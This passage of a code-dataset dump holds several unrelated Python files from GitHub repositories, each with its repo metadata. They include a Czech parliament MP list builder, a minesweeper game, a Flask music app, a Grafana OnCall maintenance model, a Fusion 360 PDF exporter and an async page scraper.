%H').strftime('%Y-%m-%d') if x is not np.nan else np.nan)\n\n# read funkce\nfunkce = pd.read_csv(path + source_path + \"funkce.unl\", sep='|', encoding='cp1250', header=None)\nheader = ['id', '', 'funkce_id', 'since', 'until', 'dummy']\n\n# JOINS\nterm_id = organy[organy['org_abbreviation'] == current_term]['org_id'].values[0]\nterm_since = organy[organy['org_id'] == term_id]['org_since'].values[0]\ndata = poslanec[poslanec['org_id'] == term_id].merge(osoby, on='id')\ncurrent_parl = zarazeni[(zarazeni['of_id'] == term_id) & (zarazeni['of_status'] == 0)]\ndata = data.merge(current_parl, on='id')\n# . region\nregion_type = typ_organu[typ_organu['type_org_name_cs'] == region_type]['type_org_id'].values[0]\norgany_region = organy[organy['type_org_id'] == region_type].loc[:, ['org_id', 'org_name_cs', 'org_name_en']].rename(columns={'org_name_cs': 'region_name_cs', 'org_name_en': 'region_name_en', 'org_id': 'region_id'})\ndata = data.merge(organy_region, on='region_id')\n# list\ndata = data.merge(organy.loc[:, ['org_id', 'org_abbreviation', 'org_name_cs', 'org_name_en']].rename(columns={'org_abbreviation': 'list_abbreviation', 'org_name_cs': 'list_name_cs', 'org_name_en': 'list_name_en', 'org_id': 'list_id'}), on='list_id')\n# groups\ngroup_type = typ_organu[typ_organu['type_org_name_cs'] == 'Klub']['type_org_id'].values[0]\norgany_group = organy[organy['type_org_id'] == group_type].loc[:, ['org_id', 'org_name_cs', 'org_name_en', 'org_abbreviation']].rename(columns={'org_name_cs': 'group_name_cs', 'org_name_en': 'group_name_en', 'org_id': 'group_id', 'org_abbreviation': 'group_abbreviation'})\ngroup_memberships = zarazeni[(zarazeni['of_id'].isin(organy_group['group_id'])) & (zarazeni['of_status'] == 0) & (zarazeni['since'] > term_since)]\n# current groups\ncurrent_group_memberships = group_memberships[group_memberships['until'].isnull()].loc[:, ['id', 'of_id', 'since', 'until']].rename(columns={'of_id': 'group_id', 'since': 'group_since', 'until': 'group_until'})\ndata = data.merge(current_group_memberships, on='id', how='left')\n# last groups for former mps\nlast_group_memberships = group_memberships[group_memberships['until'].notnull()].loc[:, ['id', 'of_id', 'since', 'until']].rename(columns={'of_id': 'group_id', 'since': 'group_since', 'until': 'group_until'})\nlast_group_memberships['group_until_day'] = last_group_memberships['group_until'].apply(lambda x: datetime.datetime.strptime(x, '%Y-%m-%d'))\nlast_group_memberships = last_group_memberships.loc[last_group_memberships.groupby('id')['group_until_day'].idxmax()]\ndata = data.merge(last_group_memberships, on='id', how='left')\n# merge groups\ndata['group_id'] = (data['group_id_x'].replace(np.nan, 0) + data['group_id_y'].replace(np.nan, 0)).astype(int)\ndata['last_group_since'] = (data['group_since_x'].replace(np.nan, '') + data['group_since_y'].replace(np.nan, ''))\ndata['last_group_until'] = data['group_until_y']\n# add group details\ndata = data.merge(organy_group, on='group_id', how='left')\ndata.rename(columns={'group_name_cs': 'last_group_name_cs', 'group_name_en': 'last_group_name_en', 'group_abbreviation': 'last_group_abbreviation', 'group_id': 'last_group_id'}, inplace=True)\n\n# currently in parliament\ndata['in_parliament'] = data['last_group_until'].isnull()\n\n# clear spaces\nc2c = data.columns[data.dtypes == 'object'].tolist()\nfor c in c2c:\n data[c] = data[c].apply(lambda x: x.strip() if type(x) == str else x)\n\n# filter\ncolumns = ['id', 'mp_id', 'family_name', 'given_name', 'title_pre', 'title_post', 'birth_date', 
'death_date', 'gender', 'region_id', 'region_name_cs', 'region_name_en', 'list_id', 'list_abbreviation', 'list_name_cs', 'list_name_en', 'last_group_id', 'last_group_abbreviation','last_group_name_cs', 'last_group_name_en', 'last_group_since', 'last_group_until', 'in_parliament', 'web', 'street', 'municipality', 'postcode', 'email', 'phone', 'fax', 'psp_phone', 'facebook']\n\n# save\ndata.loc[:, columns].to_csv(path + data_path + 'mps.csv', index=False)\ndata.loc[:, columns].to_json(path + data_path + 'mps.json', orient='records', force_ascii=False, indent=2)\n","repo_name":"michalskop/cz-psp-votes-2021-202x","sub_path":"create_mp_list.py","file_name":"create_mp_list.py","file_ext":"py","file_size_in_byte":6615,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"4773455223","text":"import random\nimport math\ngrid, mines, flags, history = [], [], [], []\nminesCount = size = sweeped = 0\nfirstClick = True\ngameEnded = False\n\ndef Init():\n    \"\"\"\n    Initialisation, in case if I want to implement save game function\n    \"\"\"\n    ClearAll()\n    return\n\n\ndef GameLoop():\n    \"\"\"\n    The Main game loops, handles inputs and passes them on to the necessary calculations\n    \"\"\"\n    GenerateGrid()\n    while not gameEnded:\n        DisplayGrid()\n        print(\"Input location: 'x y' (numbers) to sweep OR 'x y f' to flag OR 'x y s' to sweep surrounding 3x3 tiles\")\n        try:\n            IN = GetXY()[:3]\n            \n            # Stores all user input history\n            history.append(IN) \n\n            # Flipped so that coding with it makes more sense (because grid[y][x] would be the correct one)\n            IN[0], IN[1] = int(IN[1]) - 1, int(IN[0]) - 1 \n            \n            if firstClick:\n                GenerateMines((IN[0], IN[1]))\n            if len(IN) >= 3 and IN[2] == 'f':\n                # I don't actually care if the user submits more than 3 values\n                # I might change it to be stricter in the future\n                Flag(IN[0], IN[1])\n            elif len(IN) >= 3 and IN[2] == 's':\n                Sweep(IN[0], IN[1])\n            else:\n                if (IN[0], IN[1]) in flags:\n                    print(\"That position is flagged, you must unflag it first!\")\n                else:\n                    CalculateHit(IN[0], IN[1])\n            if size**2 - sweeped == minesCount:\n                Win()\n        except:\n            print(\"Please input data in the correct format.\")\n            if IN == []: #DEBUG\n                break\n        # DisplayGrid() # Thinking that I should maybe display grid before the warning texts\n\n\ndef GenerateMines(firstClickXY):\n    \"\"\"\n    Generate the mines according to `size`^2 and `minesCount`\n    Stored as an array of tuples in `mines`\n    Occurs upon user picking a spot\n    \"\"\"\n    global firstClick, mines\n\n    # Generate a list of numbers from 0 up to the grid size\n    generationRange = list(range(0, size**2))\n\n    sx, sy, ex, ey = FindSurroundingTiles(firstClickXY[0], firstClickXY[1])\n\n    # Ensure the first click is always a 0, by removing the 3x3 values around it from the number range\n    for i in range(sx, ex):\n        for j in range(sy, ey):\n            generationRange.remove(i + j * size)\n    \n    # Generate a random sample of values \n    # Based on the mines amount that the player dictated at the beginning of the game\n    rand = random.sample(generationRange, minesCount)\n\n    # For each value generated, split it into x and y values and store it in `mines` global array\n    # x: Which column, gotten through remainder of size / value\n    # y: Which row, how many times does size divide into value \n    mines = list(map(lambda value: (value%size, math.floor(value/size)), rand))\n\n    print(mines) #DEBUG\n    firstClick = False\n\n\ndef GenerateGrid():\n    \"\"\"\n    Generate a matrix of \"o\" with size `size`\n    \"\"\"\n    global grid\n    grid = [[\"o\" for i in range(size)] 
for j in range(size)]\n\n\ndef Flag(x, y):\n \"\"\"\n Flags a location so that it can't be hit be mines\n Use it again on the same location to unflag it\n \"\"\"\n global flags, grid\n if (x, y) in flags:\n flags.remove((x, y))\n grid[x][y] = \"o\"\n elif grid[x][y] == \"o\":\n flags.append((x, y))\n grid[x][y] = \"f\"\n else:\n print(\"That spot has already been revealed!\")\n\n \ndef Sweep(x, y):\n \"\"\"\n Select an already open arean, and sweep it to allow for many blocks to be allowed at once\n \"\"\"\n if grid[x][y] == \"o\" or grid[x][y] == \"f\" or grid[x][y] == \".\":\n print(\"Cannot perform sweep on that tile.\")\n return\n\n sx, sy, ex, ey = FindSurroundingTiles(x, y)\n \n flaggedTiles = 0\n \n # Sweep the surrounding area\n for i in range(sx, ex):\n for j in range(sy, ey):\n if grid[i][j] == \"f\":\n flaggedTiles += 1\n\n # See if the player flagged the enough amount\n if flaggedTiles >= int(grid[x][y]):\n for i in range(sx, ex):\n for j in range(sy, ey):\n CalculateHit(i, j)\n else:\n print(\"You must have flagged tiles greater or equal to the possible mines in the area.\")\n\n \n\ndef CalculateHit(x, y):\n \"\"\"\n Check if the position is a mine or flagged, if not, calculate what to reveal\n \"\"\"\n global grid\n if (x, y) in mines and grid[x][y] != \"f\":\n Die(x, y)\n else:\n GetSurroundingMines(x, y)\n\n\ndef GetSurroundingMines(x, y):\n \"\"\"\n Get how many mines are surrounding the current position\n If this is completely clear then recursively get the numbers for the surrounding mines\n \"\"\"\n global sweeped\n if grid[x][y] == \"o\":\n sweeped += 1\n\n surroundingMines = 0\n\n sx, sy, ex, ey = FindSurroundingTiles(x, y)\n\n # Check if any surrounding tile is a mine\n for i in range(sx, ex):\n for j in range(sy, ey):\n surroundingMines += (i, j) in mines \n\n # If there's 0 mines in the surrounding tiles, then use \".\" instead\n grid[x][y] = surroundingMines or \".\"\n\n # If every tile surrounding it is empty, then automatically open them up as well\n if surroundingMines == 0:\n for i in range(sx, ex):\n for j in range(sy, ey):\n # Only do it if they haven't been opened up alreadys\n if grid[i][j] == \"o\":\n GetSurroundingMines(i, j)\n\n\ndef Die(x, y):\n \"\"\"\n When the player hits a mine, the game ends\n \"\"\"\n global grid, gameEnded\n for mine in mines:\n if mine in flags:\n grid[mine[0]][mine[1]] = \"F\" # Flagged Mine\n else:\n grid[mine[0]][mine[1]] = \"M\" # Unflagged Mine\n \n grid[x][y] = \"X\" # Death Hit\n print(\"X is the hit, M is unflagged mine, F is flagged mine\")\n print(\"DEBUG: You hit a mine!\") #DEBUG\n\n gameEnded = True\n\n\ndef Win():\n \"\"\"\n When the player sucessfully reveals all the tiles without mines, they win\n \"\"\"\n global gameEnded\n print(\"\"\"\n ---------------------------------------\n YOU WIN!!!\n ---------------------------------------\n \"\"\")\n\n gameEnded = True\n\n\ndef DisplayGrid():\n \"\"\"\n Displays the current gamestate, with numbers on the side to help keep track\n \"\"\"\n gridDisplay = \"\"\n\n # The amount of digit of the largest number + 1 for padding\n padding = len(str(size))+1 \n\n for i in range(size+1):\n for j in range(size+1):\n if i == 0:\n a = \" \" if j == 0 else j\n elif j == 0:\n a = i\n else:\n a = grid[i-1][j-1]\n # a is what to display\n # and then after displaying a, pad it until it's the right with (using padding)\n gridDisplay += \"{0:<{padding}}\".format(a, padding=padding)\n gridDisplay += \"\\n\"\n print(gridDisplay)\n\n\ndef ClearAll():\n \"\"\"\n Clear all global variables\n 
\"\"\"\n global grid, mines, flags, minesCount, size, firstClick, history, gameEnded\n grid = mines = flags = history = []\n minesCount = size = 0\n firstClick = True\n gameEnded = False\n\n\ndef GetXY():\n \"\"\"\n Gets the input and splits them into array\n \"\"\"\n IN = input()\n IN = IN.split() # Splits by all whitespace chunks\n return IN\n\n\ndef FindSurroundingTiles(x, y):\n \"\"\"\n Find the surrounding 3x3 tiles, but within the bounding box\n \"\"\"\n return [max(x-1, 0), max(y-1, 0), min(x+2, size), min(y+2, size)] # Start X, End X, Start Y, End Y\n\n\nwhile True:\n Init()\n\n print(\"Input the size of the map and the amount of mines: 'size mines'\")\n IN = GetXY()\n size = int(IN[0])\n minesCount = int(IN[1])\n GameLoop()\n print(\"\\nTHIS IS THE FINAL BOARDSTATE\\n\")\n DisplayGrid()\n\n print(\"Do you want to restart? y/n\")\n IN = input()\n if IN.lower() != \"y\":\n break\n","repo_name":"AmethystProductions/Minesweeper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"9148379948","text":"import os\nfrom flask import Flask, request, render_template, redirect\nfrom lib.database_connection import get_flask_database_connection\nfrom lib.album_repository import AlbumRepository\nfrom lib.artist_repository import ArtistRepository\nfrom lib.album import Album\n# Create a new Flask app\napp = Flask(__name__)\n\n# == Your Routes Here ==\n\n\n# == Example Code Below ==\n\n# GET /emoji\n# Returns a smiley face in HTML\n# Try it:\n# ; open http://localhost:5000/emoji\n@app.route('/emoji', methods=['GET'])\ndef get_emoji():\n # We use `render_template` to send the user the file `emoji.html`\n # But first, it gets processed to look for placeholders like {{ emoji }}\n # These placeholders are replaced with the values we pass in as arguments\n return render_template('emoji.html', emoji=':)')\n\n@app.route('/albums', methods=['GET'])\ndef get_albums():\n connection = get_flask_database_connection(app)\n repository = AlbumRepository(connection)\n albums = repository.all()\n return render_template('albums/index.html', albums=albums )\n\n@app.route('/albums/')\ndef get_single_album(id):\n connection = get_flask_database_connection(app)\n album_repository = AlbumRepository(connection)\n album = album_repository.find(id)\n artist_repository = ArtistRepository(connection)\n artist = artist_repository.find(album.artist_id)\n return render_template('albums/single_album.html', album=album, artist=artist)\n\n@app.route('/artists')\ndef get_artists():\n connection = get_flask_database_connection(app)\n artist_repository = ArtistRepository(connection)\n artists = artist_repository.all()\n return render_template('artists/index.html', artists=artists)\n\n@app.route('/artists/')\ndef get_single_artist(id):\n connection = get_flask_database_connection(app)\n artist_repository = ArtistRepository(connection)\n artist = artist_repository.find(id)\n return render_template('artists/artist_info.html', artist=artist)\n\n@app.route('/albums/new')\ndef get_new_albums():\n return render_template('albums/new.html')\n\n@app.route('/albums/new', methods=['POST'])\ndef create_new_album():\n connection = get_flask_database_connection(app)\n album_repository = AlbumRepository(connection)\n title = request.form[\"title\"]\n release_year = request.form[\"release_year\"]\n artist_id = request.form[\"artist_id\"]\n album = Album(None, title, release_year, artist_id)\n if 
album.is_valid() == True:\n album_repository.create(album)\n album_id = _get_album_id_by_title(album.title)\n return redirect(f\"/albums/{album_id}\")\n else:\n return render_template('albums/new.html', errors=album.get_error_message())\n \n\ndef _get_album_id_by_title(title):\n connection = get_flask_database_connection(app)\n album_repository = AlbumRepository(connection)\n albums = album_repository.all()\n for album in albums:\n if album.title == title:\n return album.id\n\n\n\n# This imports some more example routes for you to see how they work\n# You can delete these lines if you don't need them.\nfrom example_routes import apply_example_routes\napply_example_routes(app)\n\n# == End Example Code ==\n\n# These lines start the server if you run this file directly\n# They also start the server configured to use the test database\n# if started in test mode.\nif __name__ == '__main__':\n app.run(debug=True, port=int(os.environ.get('PORT', 5000)))\n","repo_name":"gmckz/web_apps_music_web_app_html","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"16068972354","text":"import datetime\nfrom uuid import uuid4\n\nimport humanize\nimport pytz\nfrom django.db import models, transaction\nfrom django.utils import timezone\n\nfrom common.exceptions import MaintenanceCouldNotBeStartedError\nfrom common.insight_log import MaintenanceEvent, write_maintenance_insight_log\n\n\nclass MaintainableObject(models.Model):\n class Meta:\n abstract = True\n\n DURATION_ONE_HOUR = datetime.timedelta(hours=1)\n DURATION_THREE_HOURS = datetime.timedelta(hours=3)\n DURATION_SIX_HOURS = datetime.timedelta(hours=6)\n DURATION_TWELVE_HOURS = datetime.timedelta(hours=12)\n DURATION_TWENTY_FOUR_HOURS = datetime.timedelta(hours=24)\n\n MAINTENANCE_DURATION_CHOICES = (\n (DURATION_ONE_HOUR, \"1 hour\"),\n (DURATION_THREE_HOURS, \"3 hours\"),\n (DURATION_SIX_HOURS, \"6 hours\"),\n (DURATION_TWELVE_HOURS, \"12 hours\"),\n (DURATION_TWENTY_FOUR_HOURS, \"24 hours\"),\n )\n\n maintenance_duration = models.DurationField(default=None, null=True, choices=MAINTENANCE_DURATION_CHOICES)\n (DEBUG_MAINTENANCE, MAINTENANCE) = range(2)\n\n DEBUG_MAINTENANCE_KEY = \"Debug\"\n MAINTENANCE_KEY = \"Maintenance\"\n\n MAINTENANCE_MODE_CHOICES = ((DEBUG_MAINTENANCE, DEBUG_MAINTENANCE_KEY), (MAINTENANCE, MAINTENANCE_KEY))\n MAINTENANCE_VERBAL = {\n DEBUG_MAINTENANCE: \"Debug (silence all escalations)\",\n MAINTENANCE: \"Maintenance (collect everything in one incident)\",\n }\n\n maintenance_mode = models.IntegerField(default=None, null=True, choices=MAINTENANCE_MODE_CHOICES)\n\n maintenance_uuid = models.CharField(max_length=250, unique=True, null=True, default=None)\n maintenance_started_at = models.DateTimeField(null=True, default=None)\n maintenance_author = models.ForeignKey(\n \"user_management.user\", on_delete=models.SET_NULL, null=True, related_name=\"%(class)s_maintenances_created\"\n )\n\n def start_disable_maintenance_task(self, countdown):\n raise NotImplementedError\n\n def get_organization(self):\n raise NotImplementedError\n\n def get_team(self):\n raise NotImplementedError\n\n def get_verbal(self):\n raise NotImplementedError\n\n def force_disable_maintenance(self, user):\n raise NotImplementedError\n\n def notify_about_maintenance_action(self, text, send_to_general_log_channel=True):\n raise NotImplementedError\n\n def start_maintenance(self, mode, maintenance_duration, user):\n from 
apps.alerts.models import Alert, AlertGroup, AlertReceiveChannel\n\n with transaction.atomic():\n _self = self.__class__.objects.select_for_update().get(pk=self.pk)\n if _self.maintenance_mode is not None:\n raise MaintenanceCouldNotBeStartedError(\"Already on maintenance\")\n organization = _self.get_organization()\n team = _self.get_team()\n verbal = _self.get_verbal()\n user_verbal = user.get_username_with_slack_verbal()\n duration_verbal = humanize.naturaldelta(maintenance_duration)\n # NOTE: there could be multiple maintenance integrations in case of a race condition\n # (no constraints at the db level, it shouldn't be an issue functionality-wise)\n maintenance_integration = AlertReceiveChannel.objects_with_maintenance.filter(\n organization=organization,\n team=team,\n integration=AlertReceiveChannel.INTEGRATION_MAINTENANCE,\n ).last()\n if maintenance_integration is None:\n maintenance_integration = AlertReceiveChannel.create(\n organization=organization,\n team=team,\n integration=AlertReceiveChannel.INTEGRATION_MAINTENANCE,\n author=user,\n )\n\n maintenance_uuid = _self.start_disable_maintenance_task(maintenance_duration)\n\n _self.maintenance_duration = datetime.timedelta(seconds=maintenance_duration)\n _self.maintenance_uuid = maintenance_uuid\n _self.maintenance_mode = mode\n _self.maintenance_started_at = timezone.now()\n _self.maintenance_author = user\n _self.save(\n update_fields=[\n \"maintenance_duration\",\n \"maintenance_uuid\",\n \"maintenance_mode\",\n \"maintenance_started_at\",\n \"maintenance_author\",\n ]\n )\n self.maintenance_duration = _self.maintenance_duration\n self.maintenance_uuid = _self.maintenance_uuid\n self.maintenance_mode = _self.maintenance_mode\n self.maintenance_started_at = _self.maintenance_started_at\n self.maintenance_author = _self.maintenance_author\n if mode == AlertReceiveChannel.MAINTENANCE:\n group = AlertGroup.objects.create(\n distinction=uuid4(),\n web_title_cache=f\"Maintenance of {verbal} for {maintenance_duration}\",\n maintenance_uuid=maintenance_uuid,\n channel_filter_id=maintenance_integration.default_channel_filter.pk,\n channel=maintenance_integration,\n )\n title = f\"Maintenance of {verbal} for {duration_verbal}\"\n message = (\n f\"Initiated by {user_verbal}.\"\n f\" During this time all alerts from integration will be collected here without escalations\"\n )\n alert = Alert(\n is_the_first_alert_in_group=True,\n is_resolve_signal=False,\n title=title,\n message=message,\n group=group,\n raw_request_data={\n \"title\": title,\n \"message\": message,\n },\n )\n alert.save()\n write_maintenance_insight_log(self, user, MaintenanceEvent.STARTED)\n if mode == AlertReceiveChannel.MAINTENANCE:\n self.notify_about_maintenance_action(\n f\"Maintenance of {verbal}. Initiated by {user_verbal} for {duration_verbal}.\",\n send_to_general_log_channel=False,\n )\n else:\n self.notify_about_maintenance_action(\n f\"Debug of {verbal}. 
Initiated by {user_verbal} for {duration_verbal}.\"\n                )\n\n    @property\n    def till_maintenance_timestamp(self):\n        if self.maintenance_started_at is not None and self.maintenance_duration is not None:\n            return int((self.maintenance_started_at + self.maintenance_duration).astimezone(pytz.UTC).timestamp())\n        return None\n\n    @property\n    def started_at_timestamp(self):\n        if self.maintenance_started_at is not None and self.maintenance_duration is not None:\n            return int(self.maintenance_started_at.astimezone(pytz.UTC).timestamp())\n        return None\n\n    @classmethod\n    def maintenance_duration_options_in_seconds(cls):\n        options_in_seconds = []\n        for ch in cls.MAINTENANCE_DURATION_CHOICES:\n            options_in_seconds.append(int(ch[0].total_seconds()))\n        return options_in_seconds\n","repo_name":"grafana/oncall","sub_path":"engine/apps/alerts/models/maintainable_object.py","file_name":"maintainable_object.py","file_ext":"py","file_size_in_byte":7229,"program_lang":"python","lang":"en","doc_type":"code","stars":3019,"dataset":"github-code","pt":"71"} +{"seq_id":"3768726782","text":"import os\nimport shutil\nimport datetime\n\n# Source directory to backup\nsource_dir = '/path/to/source'\n\n# Destination directory for backups\nbackup_dir = '/path/to/backup'\n\n# Create backup directory if it doesn't exist\nif not os.path.exists(backup_dir):\n    os.makedirs(backup_dir)\n\n# Generate backup file name with timestamp\ntimestamp = datetime.datetime.now().strftime('%Y%m%d_%H%M%S')\nbackup_file = f'backup_{timestamp}'\n\n# Create a compressed backup archive\n# (shutil.make_archive appends the .tar.gz extension to the base name itself)\nbackup_path = os.path.join(backup_dir, backup_file)\nshutil.make_archive(backup_path, 'gztar', source_dir)\n\nprint(f'Backup created: {backup_file}.tar.gz')\n\n","repo_name":"Chamepp/Daily.py","sub_path":"DevOps/Server Provisioning Management/07-automated-backup.py","file_name":"07-automated-backup.py","file_ext":"py","file_size_in_byte":614,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"71"} +{"seq_id":"6773666687","text":"from ScoutSuite.providers.azure.resources.base import AzureResources\n\n\nclass PolicyAssignments(AzureResources):\n    async def fetch_all(self):\n        for raw_policy in await self.facade.policies.get_policies_assignments():\n            id, policy = self._parse_policy(raw_policy)\n            self[id] = policy\n\n    def _parse_policy(self, raw_policy):\n        policy = {}\n        policy['id'] = raw_policy.id\n\n        return policy['id'], policy","repo_name":"AboDima/azure","sub_path":"ScoutSuite/providers/azure/resources/policy/policy_assignments.py","file_name":"policy_assignments.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"71867718951","text":"import sys\n\ndef run(total):\n    global count\n    if len(total)==1:\n        print(count)\n        a=list(map(int,total))\n        print(\"NO\" if a[0]%3 else \"YES\")\n        sys.exit()\n\n    total=sum(map(int,total))\n    count+=1\n    run(list(str(total)))\n\ninput=sys.stdin.readline\nx=list(input().rstrip())\ncount=0\nrun(x)","repo_name":"HyeBin-Hub/Problem_Solving_Algorithm_","sub_path":"Baekjoon_OJ_Solving_/1769 3의 배수/1769(2).py","file_name":"1769(2).py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"3708798961","text":"#Author-Freeman\n#Description-\n\nimport adsk.core, adsk.fusion, traceback\nimport adsk.drawing\nimport time\n\n_app = adsk.core.Application.cast(None)\n_ui = adsk.core.UserInterface.cast(None)\nhandlers = 
[]\n\n_exportPDFFolder = 'C:/Users/scott/Downloads'\n\ndef run(context):\n try:\n global _app, _ui\n _app = adsk.core.Application.get()\n _ui = _app.userInterface\n docs = _app.documents\n # get f2d datafile\n datafile = None\n for df in docs:\n if df.dataFile.fileExtension == 'f2d':\n datafile = df.dataFile\n\n # check datafile\n if not datafile:\n _ui.messageBox('Abort because the \"f2d\" file cannot be found in the open documents.')\n return\n\n # open doc\n drawDoc :adsk.drawing.DrawingDocument = docs.open(datafile)\n\n # Tasks to be checked.\n targetTasks = [\n 'DocumentFullyOpenedTask',\n 'Nu::AnalyticsTask',\n 'CheckValidationTask',\n 'InvalidateCommandsTask'\n ]\n\n # check start task\n if not targetTasks[0] in getTaskList():\n _ui.messageBox('Task not found : {}'.format(targetTasks[0]))\n return\n\n # Check the task and determine if the Document is Open.\n for targetTask in targetTasks:\n while True:\n time.sleep(0.1)\n if not targetTask in getTaskList():\n break\n\n # export PDF\n expPDFpath = _exportPDFFolder + drawDoc.name + '.pdf'\n\n draw :adsk.drawing.Drawing = drawDoc.drawing\n pdfExpMgr :adsk.drawing.DrawingExportManager = draw.exportManager\n\n pdfExpOpt :adsk.drawing.DrawingExportOptions = pdfExpMgr.createPDFExportOptions(expPDFpath)\n pdfExpOpt.openPDF = True\n pdfExpOpt.useLineWeights = True\n\n pdfExpMgr.execute(pdfExpOpt)\n\n # close doc\n drawDoc.close(False)\n\n except:\n if _ui:\n _ui.messageBox('Failed:\\n{}'.format(traceback.format_exc()))\n\ndef getTaskList():\n adsk.doEvents()\n tasks = _app.executeTextCommand(u'Application.ListIdleTasks').split('\\n')\n return [s.strip() for s in tasks[2:-1]]\n","repo_name":"Aeronavics/vigilant-disco","sub_path":"Scripts/DrawingBatchExport/DrawingBatchExport.py","file_name":"DrawingBatchExport.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"11974434683","text":"from random import randint as losuj\nfrom turtle import fd, rt, pu, tracer, update, fillcolor, begin_fill, end_fill, goto\n\nkolory = ['green', (0.5, 1, 0) , 'yellow', 'orange', 'red', (0.5, 0,0) ]\n\nwiersz = [0 for i in range(100)]\nmapa = [[] + wiersz for i in range(100)]\n\ndef kwadrat (kolor):\n fillcolor(kolor)\n begin_fill()\n for i in range(4):\n fd(5)\n rt(90)\n end_fill()\n\ndef srednia (x,y):\n srednia = mapa[x][y]\n mianownik = 1\n gora = 0\n dol = 0\n lewo = 0\n prawo = 0\n if x < 99:\n prawo = 1\n if x > 0:\n lewo = 1\n if y < 99:\n gora = 1\n if y > 0:\n dol = 1\n if prawo == 1:\n srednia += mapa[x+1][y] *2\n mianownik += 2\n if lewo == 1:\n srednia += mapa[x-1][y] *2\n mianownik += 2\n if gora == 1:\n srednia += mapa[x][y+1] *2\n mianownik += 2\n if dol == 1:\n srednia += mapa[x][y-1] *2\n mianownik += 2\n if gora == 1 and prawo == 1:\n srednia += mapa[x+1][y+1]\n mianownik += 1\n if gora == 1 and lewo == 1:\n srednia += mapa[x-1][y+1]\n mianownik += 1\n if dol == 1 and prawo == 1:\n srednia += mapa[x+1][y-1]\n mianownik += 1\n if dol == 1 and lewo == 1:\n srednia += mapa[x-1][y-1]\n mianownik += 1\n #srednia += mapa[x-1][y] + mapa[x-1][y-1] + mapa[x][y-1] + mapa[x+1][y-1] + mapa[x-1][y+1] + mapa[x+1][y] + mapa[x][y+1] + mapa[x+1][y+1]\n return srednia / mianownik\n\nmapa[losuj(10,89)][losuj(10,89)] = 100000\nmapa[losuj(10,89)][losuj(10,89)] = 100000\nmapa[losuj(10,89)][losuj(10,89)] = 100000\nmapa[losuj(10,89)][losuj(10,89)] = 100000\nmapa[losuj(10,89)][losuj(10,89)] = 100000\nmapa[losuj(10,89)][losuj(10,89)] = 
100000\nmapa[losuj(10,89)][losuj(10,89)] = 100000\nmapa[losuj(10,89)][losuj(10,89)] = 100000\nmapa[losuj(10,89)][losuj(10,89)] = 100000\nmapa[losuj(10,89)][losuj(10,89)] = 100000\n\n#generowanie mapy\n\nfor i in range(1000000):\n x = losuj(0,99)\n y = losuj(0,99)\n mapa[x][y] = srednia(x,y)\n \n#print (mapa)\n\n#generowanie sredniej\n\nsrednia = 0\nfor i in range(100):\n for j in range(100):\n srednia += mapa[i][j]\n\nsrednia /= 100*100\nprint(srednia)\n\n#odchylenie standardowe\n'''\nro = 0\nsuma_ro = 0\n\nfor i in range(100):\n for j in range(100):\n suma_ro += (mapa[i][j] - srednia)**2\n\nro = (suma_ro / 100*100) ** (1/2)\nprint(ro)\n\n#print(max(max(mapa)),min(min(mapa)))\n'''\n#prepisywanie mapy na kolory\n\nfor i in range(100):\n for j in range(100):\n if mapa[i][j] <= srednia/100:\n mapa[i][j] = 1\n elif mapa[i][j] <= srednia/9:\n mapa[i][j] = 2\n elif mapa[i][j] <= srednia:\n mapa[i][j] = 3\n elif mapa[i][j] <= 3*srednia:\n mapa[i][j] = 4\n elif mapa[i][j] <= 6*srednia:\n mapa[i][j] = 5\n else:\n mapa[i][j] = 6\n\n#print(mapa)\n\n#rysowanie\ntracer(0,1)\npu()\n#goto(-10000,-10000)\n\nfor i in range(100):\n for j in range(100):\n goto((i-25)*5,(j-25)*5)\n kwadrat(kolory[mapa[i][j]-1])\n\nupdate()\ninput()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"mikikora/University","sub_path":"python/python_lista8/prog4.py","file_name":"prog4.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"13765243091","text":"from lxml import html\nimport re\nimport psycopg2\nfrom psycopg2.extras import DictCursor\nimport os\nimport asyncio\nimport aiohttp\nimport async_timeout\nfrom urllib.parse import urljoin\nfrom typing import *\nfrom itertools import chain\n\n\nasync def fetch_classutil_page(session: aiohttp.ClientSession, page_url: str):\n with async_timeout.timeout(10):\n async with session.get(page_url) as response:\n response_bytes = await response.content.read()\n\n print(\"Fetched: {}\".format(page_url))\n return response_bytes\n\n\nasync def main():\n pg_conn = psycopg2.connect(os.environ[\"DATABASE_URL\"])\n pg_conn.set_session(autocommit=True)\n\n async with aiohttp.ClientSession() as session:\n index_urls = await fetch_classutil_index(session)\n\n tasks = []\n for page_url in index_urls:\n task = asyncio.ensure_future(fetch_classutil_page(session, page_url))\n tasks.append(task)\n responses = await asyncio.gather(*tasks)\n\n tasks = []\n for response in responses:\n task = asyncio.ensure_future(process_classutil_page(response))\n tasks.append(task)\n scrapes = await asyncio.gather(*tasks) # Nested list of scrapes per page\n scrapes = list(chain.from_iterable(scrapes)) # Flatten\n\n await process_scrapes_batch(pg_conn, scrapes)\n\n pg_conn.close()\n\n\nif __name__ == '__main__':\n # Note, that the loop here is a global loop\n # Thus, when you 'schedule' a task through ensure_future or similar,\n # it automatically assumes usage of this global loop.\n #\n # So, a 'task' represents a coroutine that's scheduled to execute eventually.\n # So a Future is similar to a Promise. 
